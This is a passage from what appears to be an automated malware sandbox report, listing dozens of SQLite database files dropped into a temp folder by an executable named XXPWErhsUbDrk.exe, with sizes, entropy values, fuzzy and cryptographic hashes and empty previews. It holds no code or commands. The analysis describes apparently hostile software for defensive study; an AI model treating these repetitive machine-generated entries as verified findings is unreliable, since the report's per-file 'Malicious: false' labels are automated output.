Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IusO6MGraR

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JQEJPeElMm

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JhZtTziwvM

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JoNudZZwg5

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\KCrViFYARw

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\KsCIEWbBrN

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LOVfrm6cVP

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MhbfaL3iln

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MjpcBfGcJw

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Mo7r8WhcEB

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Mpqq6oFDmM

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\N0WMVuVbo5

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\NSFh5sh8Vv

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\NYVeaiGNzG

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\NZRwXJ5dMO

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\NZq6SPKjDB

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OCImpRzZ7f

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OCytboUdmn

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OOGQXXx3RA

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OyKGZtSDil

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PUxbLkKTiu

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PqmRM959jJ

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PzXT2lkpI9

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\QLrqjHLCFn

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\QNiuGfe5Iu

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\QOSa21ACkN

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\R8UTTHYbqk

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
